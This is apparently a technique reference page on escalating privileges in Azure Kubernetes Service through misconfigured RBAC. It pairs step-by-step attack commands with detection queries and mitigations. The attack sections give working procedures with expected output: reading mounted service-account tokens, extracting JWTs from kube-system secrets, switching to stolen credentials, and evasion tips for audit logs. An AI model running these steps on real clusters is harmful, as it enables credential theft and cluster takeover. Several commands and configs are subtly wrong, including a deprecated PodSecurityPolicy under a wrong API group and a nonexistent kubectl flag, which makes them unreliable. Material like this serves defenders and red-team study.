| Attribute | Details |
|---|---|
| Technique ID | PE-ELEVATE-007 |
| MITRE ATT&CK v18.1 | T1548 - Abuse Elevation Control Mechanism |
| Tactic | Privilege Escalation |
| Platforms | Entra ID (Azure Kubernetes Service) |
| Severity | Critical |
| Technique Status | ACTIVE |
| Last Verified | 2026-01-09 |
| Affected Versions | AKS clusters (all versions), Kubernetes RBAC implementation |
| Patched In | N/A (Design-based vulnerability, not patchable) |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Azure Kubernetes Service (AKS) Role-Based Access Control (RBAC) misconfiguration allows attackers with limited Kubernetes cluster access to escalate privileges by exploiting overly permissive ClusterRole or Role bindings. This technique leverages the hierarchical nature of Kubernetes RBAC, where a compromised service account can inherit excessive permissions through role bindings that grant cluster-admin, edit, or view roles inappropriately across namespaces.
Attack Surface: Kubernetes API server, ClusterRole/Role definitions, RoleBinding/ClusterRoleBinding resources, service account token storage in pods, API audit logs.
Business Impact: Complete cluster compromise leading to workload exfiltration, lateral movement to backing infrastructure, and persistent backdoor installation. An attacker can move from a limited pod context to full cluster administration, enabling data theft, ransomware deployment across containerized applications, and supply chain attacks through container image manipulation.
Technical Context: This attack typically completes within seconds of obtaining initial pod access. Detection is low unless specific RBAC audit policies are enabled. The privilege escalation is often irreversible without comprehensive access review and re-provisioning.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | CIS v1.24 - 5.1.1 | RBAC and Service Accounts - Least privilege role assignment |
| DISA STIG | DISA-K8S-000001 | Kubernetes pods must run with restricted service accounts |
| CISA SCuBA | CISA-K8S-AC-01 | Access Control - Enforce least privilege for service accounts |
| NIST 800-53 | AC-3, AC-6 | Access Enforcement, Least Privilege |
| GDPR | Art. 32 | Security of Processing - Access control mechanisms |
| DORA | Art. 9 | Protection and Prevention - System access controls |
| NIS2 | Art. 21(1)(d) | Managing access to assets and services |
| ISO 27001 | A.9.2.3 | Management of Privileged Access Rights |
| ISO 27005 | Risk of unauthorized privilege escalation | Compromise of containerized workload isolation |
Supported Versions:
Tools:
Enumerate existing RBAC bindings to identify overly permissive roles:
# List all ClusterRoles with dangerous permissions
kubectl get clusterroles -o json | jq '.items[] | select(.rules[]? | select(.verbs[]? == "*" or .apiGroups[]? == "*")) | {name: .metadata.name, rules: .rules}'
# List all ClusterRoleBindings (who has what role)
kubectl get clusterrolebindings -o wide
# Check a specific service account's permissions
kubectl auth can-i --list --as=system:serviceaccount:default:default
What to Look For:
*) or overly broad apiGroups (*)cluster-admin, edit, or system:masters to non-admin accountsVersion Note: Command syntax is consistent across Kubernetes 1.20+
# Check mounted service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Test current permissions
kubectl auth can-i get pods --namespace=default
kubectl auth can-i create pods --namespace=default
kubectl auth can-i get secrets
# Enumerate cluster roles available
kubectl get clusterroles | head -20
What to Look For:
Supported Versions: Kubernetes 1.20+, all AKS versions
Objective: Determine if the default service account has excessive cluster permissions
Command:
kubectl auth can-i --list
Expected Output (Vulnerable):
Resources Non-Resource URLs * [*]
configmaps [] [] []
pods [] [] []
pods/log [] [] []
What This Means:
Objective: Identify dangerous pre-built roles available in the cluster
Command:
kubectl get clusterroles -o json | jq -r '.items[] | .metadata.name' | sort
Expected Output:
admin
cluster-admin
edit
system:aggregate-to-admin
system:masters
view
...
What This Means:
admin, edit, and cluster-admin are pre-built roles with escalated permissionsObjective: Identify which service accounts are bound to dangerous roles
Command:
kubectl get rolebindings,clusterrolebindings --all-namespaces -o json | jq '.items[] | select(.roleRef.name == "cluster-admin" or .roleRef.name == "edit" or .roleRef.name == "admin") | {namespace: .metadata.namespace, subject: .subjects[], role: .roleRef.name}'
Expected Output (Vulnerable):
{
"namespace": "default",
"subject": {
"kind": "ServiceAccount",
"name": "app-sa",
"namespace": "default"
},
"role": "edit"
}
What This Means:
app-sa service account has edit permissions in the default namespaceOpSec & Evasion:
--user=attacker which appear in audit logsObjective: Deploy a new pod with escalated permissions
Command:
kubectl create deployment escalate-pod --image=alpine --namespace=default
kubectl set serviceaccount deployment escalate-pod admin-sa --namespace=default
kubectl patch deployment escalate-pod --patch '{"spec":{"template":{"spec":{"serviceAccountName":"admin-sa"}}}}' --namespace=default
Expected Output:
deployment.apps/escalate-pod created
deployment.apps/escalate-pod patched
What This Means:
Troubleshooting:
kubectl run instead: kubectl run escalate-pod --image=alpine --overrides='{"spec":{"serviceAccountName":"admin-sa"}}'Objective: Verify privilege escalation within the new pod container
Command (Execute inside the pod):
kubectl exec -it escalate-pod-<hash> -- /bin/sh
# Inside the pod:
kubectl auth can-i --list
kubectl get secrets -n kube-system
Expected Output:
Resources * [*]
*.* [] []
NAME TYPE DATA
...
What This Means:
OpSec & Evasion:
--as=system:serviceaccount:default:admin-sa to impersonate elevated accounts in audit logskubectl debug <pod> -it --image=alpineSupported Versions: Kubernetes 1.20+
Objective: Find ClusterRoles that grant * (wildcard) permissions
Command:
kubectl get clusterroles -o json | jq '.items[] | select(.rules[] | select(.verbs[] == "*" or .apiGroups[] == "*")) | {name: .metadata.name, rules: .rules}'
Expected Output (Vulnerable):
{
"name": "custom-admin",
"rules": [
{
"apiGroups": ["*"],
"resources": ["*"],
"verbs": ["*"]
}
]
}
What This Means:
custom-admin role has completely unrestricted accessObjective: Find which service accounts are bound to dangerous roles
Command:
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "custom-admin") | {name: .metadata.name, subjects: .subjects[]}'
Expected Output:
{
"name": "custom-admin-binding",
"subjects": {
"kind": "ServiceAccount",
"name": "app-service",
"namespace": "applications"
}
}
What This Means:
app-service account in the applications namespace has wildcard permissionsObjective: Transition from limited pod context to admin service account
Command:
# Use the admin service account's token (if accessible)
export TOKEN=$(kubectl get secret -n applications $(kubectl get secret -n applications | grep app-service | awk '{print $1}') -o jsonpath='{.data.token}' | base64 -d)
# Configure kubectl to use the admin token
kubectl config set-credentials admin-creds --token=$TOKEN
kubectl config set-context admin-context --user=admin-creds --cluster=<cluster-name>
kubectl config use-context admin-context
# Verify escalation
kubectl auth can-i --list
Expected Output:
Resources * [*]
*.* [] []
What This Means:
OpSec & Evasion:
Supported Versions: Kubernetes 1.20+
Objective: Enumerate all service accounts and their RBAC bindings cluster-wide
Command:
# List all service accounts and their namespaces
kubectl get serviceaccounts --all-namespaces -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name}'
# For each service account, check its role bindings
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
echo "=== Namespace: $ns ==="
kubectl get rolebindings -n $ns -o json | jq '.items[] | {role: .roleRef.name, subjects: .subjects[]}'
done
Expected Output:
{
"namespace": "default",
"name": "default"
}
{
"namespace": "kube-system",
"name": "kubernetes-dashboard"
}
...
What This Means:
Objective: Obtain the JWT token of a service account with higher privileges
Command:
# If you have RBAC access to list secrets in kube-system or other namespaces
kubectl get secret -n kube-system -o json | jq '.items[] | select(.type == "kubernetes.io/service-account-token") | {name: .metadata.name, namespace: .metadata.namespace}'
# Extract a specific token
SECRET_NAME=$(kubectl get secret -n kube-system | grep kubernetes-dashboard | awk '{print $1}')
kubectl get secret $SECRET_NAME -n kube-system -o jsonpath='{.data.token}' | base64 -d
Expected Output:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Ii...
What This Means:
Objective: Authenticate as the higher-privilege service account
Command:
# Use the extracted token to make API calls
curl -k -H "Authorization: Bearer $EXTRACTED_TOKEN" https://kubernetes.default.svc.cluster.local/api/v1/pods
# Or configure kubectl with the token
kubectl config set-credentials dashboard-sa --token=$EXTRACTED_TOKEN
kubectl config set-context dashboard-context --user=dashboard-sa --cluster=$(kubectl config current-context)
kubectl config use-context dashboard-context
# Verify escalation
kubectl auth can-i delete clusterrolebindings
Expected Output:
yes
What This Means:
kubernetes-dashboard service accountOpSec & Evasion:
Version: Latest stable (v1.28+) Minimum Version: 1.20 Supported Platforms: Linux, Windows, macOS
Installation:
# Download and install kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl
sudo mv kubectl /usr/local/bin/
Usage:
# Check permissions
kubectl auth can-i get pods
# List roles
kubectl get roles,clusterroles
# Create a pod
kubectl create deployment app --image=nginx
Version: Latest stable (2.55+) Minimum Version: 2.0 Supported Platforms: Linux, Windows, macOS
Installation:
# macOS
brew install azure-cli
# Linux
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
# Windows
chocolatey install azure-cli
Usage:
# Connect to AKS
az aks get-credentials --resource-group myGroup --name myCluster
kubectl config current-context
# List AKS clusters
az aks list --output table
Version: 3.0+ Minimum Version: 1.0 Supported Platforms: Linux, Windows, macOS
Installation:
# From GitHub releases
wget https://github.com/aquasecurity/kubescan/releases/download/v2.0.0/kubescan-linux
chmod +x kubescan-linux
./kubescan-linux cluster
Usage:
# Scan for RBAC misconfigurations
./kubescan audit --kubeconfig ~/.kube/config
# Simulate escalation discovery
kubectl auth can-i create clusterrolebindings
# If result is "yes", privilege escalation is possible
Reference: While Atomic Red Team does not have a Kubernetes-specific test for this technique, you can reference Atomic Red Team T1548
Rule Configuration:
AzureDiagnostics (AKS cluster audit logs)operationName, properties.request.verb, properties.request.objectRef.resourceKQL Query:
AzureDiagnostics
| where ResourceProvider == "Microsoft.ContainerService"
| where operationName in ("create", "patch", "replace")
| where properties.request.objectRef.resource in ("clusterrolebindings", "rolebindings")
| where properties.request.objectRef.apiVersion contains "rbac"
| extend UserIdentity = properties.authentication.principalId
| extend RoleName = properties.request.objectRef.name
| summarize Count = count() by UserIdentity, RoleName, tostring(properties.request.verb)
| where Count > 0
What This Detects:
Manual Configuration Steps (Azure Portal):
AKS RBAC Binding Modification DetectedHigh5 minutes1 hourKQL Query:
AzureDiagnostics
| where ResourceProvider == "Microsoft.ContainerService"
| where properties.request.verb == "get"
| where properties.request.objectRef.resource == "secrets"
| where properties.request.objectRef.namespace in ("kube-system", "kube-public")
| where properties.authentication.principalId != "system:masters"
| extend ServiceAccount = properties.request.user.username
| extend TargetNamespace = properties.request.objectRef.namespace
| project TimeGenerated, ServiceAccount, TargetNamespace, tostring(properties.request.objectRef.name)
What This Detects:
Not applicable for AKS cluster-side detection. Monitoring should occur at the Azure platform level via Microsoft Sentinel/Defender for Cloud or on the container host via kubelet logs.
Alert Name: “Suspicious role assignment in Kubernetes cluster”
Manual Configuration Steps (Enable Defender for Cloud):
Reference: Microsoft Defender for Kubernetes Threat Detection
Implement Least Privilege RBAC: Restrict service account permissions to the minimum required for functionality.
Manual Steps (Azure Portal):
Manual Steps (kubectl/YAML):
# Create a restrictive role
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
namespace: default
name: app-role
rules:
- apiGroups: [""]
resources: ["pods", "configmaps"]
verbs: ["get", "list", "watch"]
---
# Bind the role to a service account
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
namespace: default
name: app-rolebinding
subjects:
- kind: ServiceAccount
name: app-sa
namespace: default
roleRef:
kind: Role
name: app-role
apiGroup: rbac.authorization.k8s.io
# Apply the YAML
kubectl apply -f restrictive-rbac.yaml
Disable Dangerous Default Permissions: Remove cluster-admin bindings from unnecessary accounts.
Manual Steps:
# Identify dangerous bindings
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "cluster-admin") | .metadata.name'
# Remove the binding
kubectl delete clusterrolebinding <binding-name>
Enable Kubernetes RBAC Audit Logging: Ensure all RBAC changes are logged for detection and forensics.
Manual Steps (Azure Portal):
AKS-RBAC-Auditkube-audit, kube-audit-adminUse Azure Managed Identities Instead of Service Accounts: Replace manual service account tokens with managed identities.
Manual Steps (Azure Portal):
Implement Pod Security Standards: Restrict the capabilities of pods to prevent lateral movement.
Manual Steps:
apiVersion: policy.k8s.io/v1beta1
kind: PodSecurityPolicy
metadata:
name: restricted
spec:
privileged: false
runAsUser:
rule: 'MustRunAsNonRoot'
fsGroup:
rule: 'RunAsAny'
Enable Azure Policy for Kubernetes: Enforce compliance policies cluster-wide.
Manual Steps (Azure Portal):
KubernetesKubernetes cluster containers should only use allowed imagesConditional Access (Entra ID): Restrict access to the Kubernetes API based on device and location policies.
Manual Steps:
Restrict Kubernetes API AccessRBAC Group-Based Assignments: Use Entra ID groups for RBAC role assignments instead of individual accounts.
Manual Steps (kubectl):
# Create a rolebinding for an Entra ID group
kubectl create rolebinding app-readers \
--clusterrole=view \
--group="GROUP_OBJECT_ID_FROM_ENTRA_ID" \
--namespace=default
# Check if cluster-admin is only bound to trusted users
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "cluster-admin")'
# List all service accounts and their permissions
kubectl get serviceaccounts --all-namespaces -o json | jq -r '.items[] | "\(.metadata.namespace):\(.metadata.name)"' | while read SA; do
NS=$(echo $SA | cut -d: -f1)
NAME=$(echo $SA | cut -d: -f2)
echo "=== $SA ==="
kubectl auth can-i --list --as=system:serviceaccount:$NS:$NAME 2>/dev/null | grep -E "^\*|create|delete|patch"
done
Expected Output (If Secure):
No ClusterRoleBindings for cluster-admin (or only for system accounts)
=== default:app-sa ===
configmaps [] [] [get list watch]
pods [] [] [get list watch]
What to Look For:
cluster-admin bindings limited to system:masters or built-in system accountsget, list, watch verbs (read-only)*) verbs or apiGroupsadmin-, root-, escalate-, or time-based names/var/run/secrets/kubernetes.io/serviceaccount/ that are accessed by non-kubelet processescreate or patch operations on clusterrolebindings or roles from unexpected users/var/log/audit.log on the API server (if enabled) or AzureDiagnostics in Log Analyticskubectl logs <pod>)/var/run/secrets/kubernetes.io/serviceaccount/token to analyze the JWT (user, groups, capabilities)kubectl describe pod <pod> may show suspicious volume mounts or image changesIsolate:
Command:
# Immediately delete the compromised pod
kubectl delete pod <compromised-pod> --namespace=<namespace>
# Or, revoke its service account token
kubectl delete secret -l serviceaccount=<sa-name> --namespace=<namespace>
Manual (Azure Portal):
Collect Evidence:
Command:
# Export audit logs from API server
kubectl logs -n kube-system -l component=kube-apiserver | grep "roleBinding\|clusterrolebinding" > /evidence/audit-logs.txt
# Export pod logs
kubectl logs <compromised-pod> --namespace=<namespace> --all-containers > /evidence/pod-logs.txt
# Export service account secrets
kubectl get secret -n <namespace> -o yaml > /evidence/secrets.yaml
Remediate:
Command:
# Review and delete unauthorized role bindings
kubectl delete rolebinding <malicious-binding> --namespace=<namespace>
kubectl delete clusterrolebinding <malicious-cluster-binding>
# Restore default RBAC policies from backup or redeploy cluster
kubectl apply -f <backup-rbac-config>.yaml --force-overwrite
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-005] AKS Control Plane Exploitation | Gain initial access to the cluster via exposed Kubelet API or container escape |
| 2 | Privilege Escalation | [PE-ELEVATE-007] AKS RBAC Excessive Permissions | Exploit misconfigured RBAC to escalate from pod to cluster-admin |
| 3 | Lateral Movement | [LM-AUTH-030] AKS Service Account Token Theft | Extract and abuse service account tokens for cross-namespace movement |
| 4 | Credential Access | [CA-TOKEN-013] AKS Service Account Token Theft | Harvest tokens from compromised service accounts |
| 5 | Persistence | [PERSIST-009] Kubernetes Secret Injection | Create backdoor service accounts and roles for persistent access |
| 6 | Impact | Container Image Tampering / Workload Exfiltration | Manipulate deployments or exfiltrate containerized data |
kubectl get secrets -n kube-system → Extracted cluster admin credentials